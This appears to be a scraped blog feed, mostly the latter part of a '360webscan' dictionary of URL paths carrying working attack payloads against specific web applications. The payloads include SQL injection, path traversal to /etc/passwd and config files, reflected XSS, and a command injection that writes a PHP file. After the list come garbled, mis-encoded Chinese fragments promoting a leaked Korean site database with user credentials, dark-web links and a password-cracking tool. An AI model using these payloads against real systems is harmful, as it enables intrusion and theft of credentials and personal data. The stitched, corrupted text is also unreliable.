/selfservice/welcome/downboardview?id=-1%20union%20all%20select%20db_name(),2,CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/server-info
/server-status
/servermanage.php?NodeID=-1&SelType=-1%29%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%23
/servermanage.php?SelType=-1)%20AND%20(SELECT%20360%20FROM(SELECT%20COUNT(*),CONCAT(0x3A703A,(MID((IFNULL(CAST(md5(0x7765627363616e)%20AS%20CHAR),0x20)),1,50)),0x3A713A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20(1=1
/service/local/outreach/welcome/nexusSpaces.css
/service/showdevice.php?iDeviceId=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23
/servlet/FileDownload?filepath=/etc/passwd&dispname=42873.txt
/servlet/FileDownload?filepath=c:/windows/win.ini&dispname=42873.txt
/servlet/FileUploadServlet?fileName=../WEB-INF/proxool.xml
/servlet/HistoryDownLoad?id=-1%20union%20all%20select%201,CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/servlet/OutputCode?path=c:/windows/win.ini
/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../../../etc/passwd
/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../conf/resin.conf
/servlet/com.runqian.report.view.html.GraphServlet?picFile=../../../../../../../../conf/resin.conf
/servlet/hirelogin/BrowseFileServlet?dbName=Usr&a0100=-1'%20union%20all%20select%20CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE),2--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/servlet/hirelogin/BrowseFileServlet?dbName=Usr&i9999=-1%20union%20all%20select%20CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE),2--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/servlet/hirelogin/BrowseFileServlet?dbName=k00%20where%201=2%20union%20all%20select%20CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE),2--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/servlet/performance/fileDownLoad?article_id=-1%20union%20all%20select%20CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE),2--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/servlet/performance/fileDownLoad?opt=hire&e01a1=-1'%20union%20all%20select%20CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE),2--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/servlet/performance/fileDownLoad?opt=workView&file_id=-1%20union%20all%20select%20CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE),2--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/servlet/performance/fileDownLoad?opt=workView&file_id=-1&p0100=-1%20union%20all%20select%20CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE),2--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/setMaterials.do?ITEM_ID=12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/setup/setup1.jsp
/sgin/filemanage/default.asp?action=viewfolder&path=
/share.php?F_email=test@vul.org%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/test
/shipinbofang.jsp?TID=-1234'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL%20FROM%20DUAL--%20&ColumnID=86
/shop.php?ac=view&shopid=1-cfreer
/shop.php?ctl=index&act=ajax_purpose_store&purpose_id=1%20and%20(select/**/%201%20from/**/%20(select/**/%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from/**/%20information_schema.tables%20group%20by%20x)a)%23
/show.asp?id=2621%20union%20SELECT%201,2,0x7700650062007300630061006E003A0066006F0075006E0064003A00760075006C00,4,5,6,7,8,9,10,11,12,13,14,15,16%20FROM%20ADMIN
/show.aspx?type=1&action=GetImg&pids=(select%20char(58))
/show.jsp?id=5'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20AND%20'AT'='AT
/showmanufacturer.aspx?categoryfilterid=-12%20and%201=char(106)&manufacturerfilterid=1&distributorfilterid=0&affiliatefilterid=0&customerlevelfilterid=0&producttypefilterid=0&show=all
/shownews.aspx?newsno=-1'%20AND%201=CHAR(106)%20--
/shownews.aspx?newsno=-1'%20and%201=char(106)%20--
/showproduct.aspx?ProductID=6559&CategoryFilterID=-51%20or%201=char(106)
/showsearch.aspx?HotSearchWord=-1';%20if(12=13)%20select%201234%20else%20drop%20function%20jjyy%20--
/showtopiclist.aspx?direct=0%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&forumid=-1&order=1&page=1&search=1&type=
/showtopiclist.aspx?direct=0&forumid=-1&order=1%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&page=1&search=1&type=
/siteserver/UserRole/background_userAdd.aspx?UserName=1122'%20and%20char(106)%20=1%20--&ReturnUrl=../cms/console_user.aspx
/siteserver/UserRole/modal_userView.aspx?UserName=dd'%20and%201=char(106);--
/siteserver/cms/console_tableMetadata.aspx?ENName=cms_Content%27%29%20and%200%3C%28select%20top%201%20isnull%28cast%28%5Breer1122%5D%20as%20nvarchar%284000%29%29%2Cchar%2832%29%29%20from%20bairong_Administrator%20where%201%3D1%20and%20UserName%20not%20in%20%28select%20top%200%20UserName%20from%20bairong_Administrator%20where%201%3D1%20group%20by%20UserName%29%29%3B--
/siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%20char(106)=1%20--
/siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1111'%20and%20char(106)=0%20--
/siteserver/userRole/modal_sendMail.aspx?From=User&UserNameCollection=test'+and+char(106)%2bchar(106)=0%20--
/sofpro/SltGecsMember?actiontype=WEB_EDIT_DETAIL&member_seq=-1
/solr/dev/admin/
/specialty.asp?Tbynf=1%20and%201%3Echar(106)%20--
/sql.inc
/sqoa/faWenAction.do?step=toRead&readFile.id=&readFile.fileId=../../../../../../../../../etc/passwd&readFile.type=txt
/sssweb/onlineVote/fvote.aspx?questionnaireID=-11'%20and%201=char(106)%20--
/stat/stat.aspx?statid=1'%20And%201=(select%20db_name())%20--
/statistics.php?pageurl=pageurl&referer=http://www.baidu.com/?wd=aaaa%2527),((select%201%20from%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2,3,4,5,6,7,8,9)%23
/statistics.php?referer=http://www.google.com/search?q=a%2527),(null,null,null,null,null,null,null,null,(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20concat(user_name,0x7c,password)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b))%23&b=c&pageurl=1
/store.php?Uid=1-db_mymps-my_member%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/styles/outlook1/tools/calendar/calEditEvent.php?action=edit%22%3E%3Cscript%3Ealert(42873)%3C/script%3Ebad=%22&calid=
/subareamanage.php?NodeID=-1%20UNION%20SELECT%201%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%23
/subareamanage.php?Page=1&&DelNode=1&NodeType=-1%20or%201=1%20and%20(SELECT%201%20and%20ROW(1,1)%3E(SELECT%20COUNT(*),CONCAT(md5(0x7765627363616e),0x3a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)
/suggestwordList.php?searchWord=a&language=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20md5(1122)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)
/superadmin/
/swfupload/upload_files.php?uid=1%7Cecho+cedar+%3E%3Eohehe.php
/sys/user/addfunction.jsp?RoleID=1')%20UNION%20all%20SELECT%200x3E5F6F686568655F3C,NULL,NULL,NULL,NULL,NULL,NULL%23
/sys/user/agenttree_xml.jsp?_conf_type=user&_parent_id=1'%20UNION%20all%20SELECT%20NULL,NULL,0x3E5F6F686568655F3C,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%23
/sys/user/changedept.jsp?DeptID=1'%20UNION%20ALL%20SELECT%200x3E5F6F686568655F3C,NULL%23&AgentID=1
/sys/user/p_dept_group_seldept.jsp?GroupID=1')%20UNION%20all%20SELECT%200x3E5F6F686568655F3C,NULL,NULL,NULL%23
/sys/user/portal_module_permission_parts_xml.jsp?_conf_type=user&_parent_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,0x6A7573743A693A66696E64,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%23
/sys/user/webagentlist.jsp?DeptID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,0x6A7573743A693A66696E64,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%23
/sys/user/webagenttree_xml.jsp?_parent_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,0x6A7573743A693A66696E64,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%23
/sysinfo.jsp
/system/
/system/config/groupTreeXml.jsp?type=group&SG04=1'+UNION+ALL+SELECT+1,CHAR%2859%29%2bCHAR%28106%29,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--
/system/login.asp
/system/login.aspx
/system/login.jsp
/system/login.php
/system/nhome/login.jsp?message=%22)--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/systems/dept/dept_edit.aspx?CodeId=-4)%20and%201=char(106)--&id=1057
/temp/compiled/pages.lbi.php/%22%3C/form%3E%3CsCripT%3Ealert(42873)%3C/scRipt%3E
/templates/
/tender/tender/findlssuingBytender.action?currentPage=1&pageSize=10&returnWayId=0&moneyUseId=0&periodTimeId=0&periodDayId=0&award=2&money1=1%20and%20(select%201%20from%20(select%20count(*),concat(md5(0x221),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23&money2=1&satate=100
/test.asp
/test.aspx
/test.jsp
/test.php
/tj/list.aspx?typeid=1'%20and%20(char(106)%2bchar(106))%3E0--
/tj/total.aspx?act=other&typeid=1%27%20AND%209518%3DCONVERT%28INT%2C%28SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2b%28SELECT%20%28CASE%20WHEN%20%289518%3D9518%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2bCHAR%28100%29%29%29%29%20AND%20%27xhJK%27%3D%27xhJK
/toall/desktop/dbform.asp?fn=&fntxt=&varid=8%20AND%201122%3DCONVERT%28INT%2C%28CHAR%2899%29%2bCHAR%28102%29%2bCHAR%28114%29%2bCHAR%28101%29%2bCHAR%28101%29%2bCHAR%28114%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28106%29%2bCHAR%28120%29%29%29
/tools/life/jiufang/?q=%7B%24%7Bexit%28md5%28%27fdsfdsfds%27%29%29%7D%7D
/tophp.asp
/tp_2_2/real_time_rfc2544_result.jsp?testTime=/../../../../../../../../etc/passwd%00
/treefordevicelog.php?iSub=1&id=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23
/treeformap.php?iSub=1&id=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23
/treeforrecordalarm.php?iSub=1&id=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23
/truexxgk/app/nrglController/loadZwgk?zdjc=reer'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd&type=1
/truexxgk/app/xxgkznController/firstXxgkznByZdjc/'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/tt/trade/register.asp?step=checkdup&checkname=ologinname&checkval=haha'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&pk=0
/tuan.php?ctl=order&search=YToxOntzOjc6InNlX25hbWUiO3M6Mjg1OiInIGFuZCAwIHVuaW9uIHNlbGVjdCAxLG1kNSgweDc3NjU2MjczNjM2MTZlKSwzLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzLDI0LDI1LDI2LDI3LDI4LDI5LDMwLDMxLDMyLDMzLDM0LDM1LDM2LDM3LDM4LDM5LDQwLDQxLDQyLDQzLDQ0LDQ1LDQ2LDQ3LDQ4LDQ5LDUwLDUxLDUyLDUzLDU0LDU1LDU2LDU3LDU4LDU5LDYwLDYxLDYyLDYzLDY0LDY1LDY2LDY3LDY4LDY5LDcwLDcxLDcyLDczLDc0LDc1LDc2LDc3LDc4LDc5LDgwLDgxLDgyLDgzLDg0ICMiO30=
/tuan.php?ctl=subscribe&act=unsubscribe&code=JyBhbmQgKHNlbGVjdC8qKi8gMSBmcm9tLyoqLyAoc2VsZWN0LyoqLyBjb3VudCgqKSxjb25jYXQobWQ1KDExMjIpLGZsb29yKHJhbmQoMCkqMikpeCBmcm9tLyoqLyBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj
/u.php/member-login?id=header_login%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%2842873%29%3C/ScRiPt%3E&style=1
/u8qx/login_SelectDM.jsp?type=tree&select=slGS&id=inputDW&cdtn=kjnd=-4622%20UNION%20ALL%20SELECT%20CHAR%28113%29%2bCHAR%28107%29%2bCHAR%28107%29%2bCHAR%2898%29%2bCHAR%28113%29%2bCHAR%2875%29%2bCHAR%28122%29%2bCHAR%2874%29%2bCHAR%28103%29%2bCHAR%28118%29%2bCHAR%28103%29%2bCHAR%2888%29%2bCHAR%2875%29%2bCHAR%2879%29%2bCHAR%2887%29%2bCHAR%28118%29%2bCHAR%28121%29%2bCHAR%28122%29%2bCHAR%28107%29%2bCHAR%28115%29%2bCHAR%2886%29%2bCHAR%2873%29%2bCHAR%2885%29%2bCHAR%28118%29%2bCHAR%28104%29%2bCHAR%28119%29%2bCHAR%28108%29%2bCHAR%2879%29%2bCHAR%2885%29%2bCHAR%2865%29%2bCHAR%28102%29%2bCHAR%28100%29%2bCHAR%2868%29%2bCHAR%2899%29%2bCHAR%2887%29%2bCHAR%28101%29%2bCHAR%2883%29%2bCHAR%28106%29%2bCHAR%2869%29%2bCHAR%2880%29%2bCHAR%2868%29%2bCHAR%2890%29%2bCHAR%28106%29%2bCHAR%2897%29%2bCHAR%2882%29%2bCHAR%28113%29%2bCHAR%2898%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28113%29,48,48%20--%20-
/uapws/
/uapws/service/
/uapws/service/nc.itf.ses.inittool.PortalSESInitToolService?wsdl
/uc_server/admin.php
/uc_server/data/config.inc.php.bak
/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:80&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
/upload/
/uploads/
/user
/user.php?act=is_registered&username=%CE%27360webscan%23
/user.php?back_act=http://127.0.0.1%22style=x:expression(alert(42873))%3E
/user/?q=help&type=search&page=1&kw=webscan%22;%20alert(42873);//&lang=zh_CN
/user/City_ajax.aspx?Cityid=-1'%20%20union%20%20SELECT%20'webscan',2%20FROM%20fs_sys_User%20WHERE%20id=7%20%20and%20'1'='1
/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+20120328,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
/user/http/httpnews.php?type=html&id=1%20and%201=2%20union%20all%20select%201,@@version,3,md5(0x45154),5,6,7,8,9,10
/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500
/user/storage_explore.php
/user/storage_fold_explore.php
/user/userzone/School/download.aspx?f=/config/ConnectionStrings.config
/usermanage.php?NodeID=-1%20UNION%20SELECT%201%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%23
/users.ini
/users.txt
/utilities.php?tail_lines=50&message_type=-1&go.x=10&go.y=9&refresh=20&reverse=1&filter=%22%3E%25%3Cscript%3Eprompt(42873)%3C/script%3E&page=1&action=view_logfile
/varset/modifyTime.asp?varname=&id=495'%20union%20all%20select%201,2,3,0x66696E643A76756C,5,6,7,8,9%20from%20teachers%20--
/vc/vc/index/que_index.jsp
/venus/AsVenusCA/desk/message/reply.asp
/video/videoView.jsp?videoid=250%20AND%201=(SELECT%20CHAR(106)%2bCHAR(58))
/viewlist.aspx?typeid=webscan()'
/views.asp
/viewthread.php?tid=250523
/viewthread.php?tid=31926
/viewthread.php?tid=8974
/vote.php?act=dovote&name[1%20and%20(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23][111]=aa
/voteresult.aspx?activeid=-1%20UNION%20SELECT%201,char(106)%2bchar(106),3,4,5%20from%20syscolumns%20--
/wap.php?pageBody=%3Cscript%3Ealert(42873)%3C/script%3E
/wap/index.php
/wap/index.php/admin.php?c=job&pr=-1%20UNI00000000ON%20sel00000000ect%23%0amd5(0x4141),1,md5(0x4141),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%23&hy=%0a,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%23&num=&exp=&edu=%0a%20fro00000000m%20phpyun_admin_user%20limit%201%23&type=&uptime=
/wap/index.php?ac=search&at=taglist&tagkey=a%2527
/wap/index.php?ctl=synclogin&post_type=json&login_type=Sina&from=wap&sina_id=-1'%20union%20select%201,2,concat(0x7c,md5(1122),0x7c),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72%23&code=1
/wap/index.php?keywords='and((select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))and'&mod=search&page=2
/wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e,jishigou_members.password,0x27,0x7e)%20from%20jishigou_members%20where%20uid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
/wap/index.php?mod=search&keywords=%df')%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/wap/index.php?mod=space&userid=1'%20and%20extractvalue(1,(select%20md5(1122)from%20my_admin%20limit%201));%20%23
/was5/admin/
/wc.db
/wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
/web-console/
/web/?id=-1'
/web/User_Sort_List.aspx?infoid=2%20and%20char(106)=0
/web/common/getfile.jsp?p=..%5C%5C..%5C%5C..%5C%5C..%5C%5Cetc%5C%5Cpasswd
/web/doc_hit.jsp?documentid=-21%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
/web/server/serverstart.php?machineid=1%27%20and%20%28select%201%20from%20%28select%20count%28%2a%29%2Cconcat%28md5%280x221%29%2Cfloor%28rand%280%29%2a2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
/web/systemconfig/guangboinfo.php?id=1%27%20and%20%28select%201%20from%20%28select%20count%28%2a%29%2Cconcat%28md5%280x221%29%2Cfloor%28rand%280%29%2a2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23&from=list
/webConfigSet/configSetting.aspx?url=/login/index.aspx
/webSend/entity_show.jsp?unid=-1'%20or%201=2%20--&fileName=webscan.jsp
/webUser/webUser!list.action
/webadmin/
/webeditor/admin/
/webfm/webUI/uistrings.cgi
/weblogin/
/webmail/main/searchAddr.inc.php?value=123%25%27%29%20union%20select%20concat%28tm_name%2C0x23%2Ctm_domain%2C0x23%2Cmd5%280x4141%29%29%2Ctm_passwd%20from%20todaymail%20limit%200%2C1%23&ftm_id=103361
/webmanage/
/webmaster/
/webscan360noThisFile*~1*/.aspx
/webscan_360_cn.html
/website/approve/approveSiteAction!findApproveGuide.action?businesscode=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&location=&subcode=000
/website/approve/approveSiteAction!listApproveModel.action?action=search&forward=searchmodel&issueTypename=&style=4&subType=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
/website/approve/convenientSiteAction!getSXList.action?department=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&mill=488&style=4
/website/dflz/dflzCjAction!caiwugk_list.action?orgCode=&orgName=&zuOrgCode=&zuOrgName=&cwgkbbh=-21'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--%20&cwgkbmc=

The post 360webscan dictionary: website detection, directory and vulnerability scanning appeared first on 🔰雨苁ℒ🔰.


韩囜眑站数据泄露 甚户名user 邮箱mail 密码pw


韩囜眑站数据泄露 387䞪暗眑眑址

韩囜眑站数据泄露

泄露眑站 www.enanoit.co.kr

 䞺什么那么倚数据泄露? 尀其是圚䞭囜,什么郜芁实名讀证,电话泚册,泚册䞪垃土眑站还各种公民信息郜芁,䜠是魔鬌吗?这些信息给了䜠䜠华䞍胜奜奜的保存,劈的智障!党郚匿名泚册倚奜,数据被黑了也没卵甚,现圚这些泄挏的数据,什么郜枅枅楚楚的,䜕谈隐私保技?

site:https://www.enanoit.co.kr


The post 韩囜眑站数据泄露 甚户名user 邮箱mail 密码pw appeared first on 🔰雚苁ℒ🔰.


rar密码砎解 zip密码砎解 压猩包密码砎解 pwcracker


rar密码砎解 zip密码砎解 压猩包密码砎解

rar密码砎解 zip密码砎解 压猩包密码砎解 387䞪暗眑眑址

pwcracker䞀欟插件化密码爆砎框架

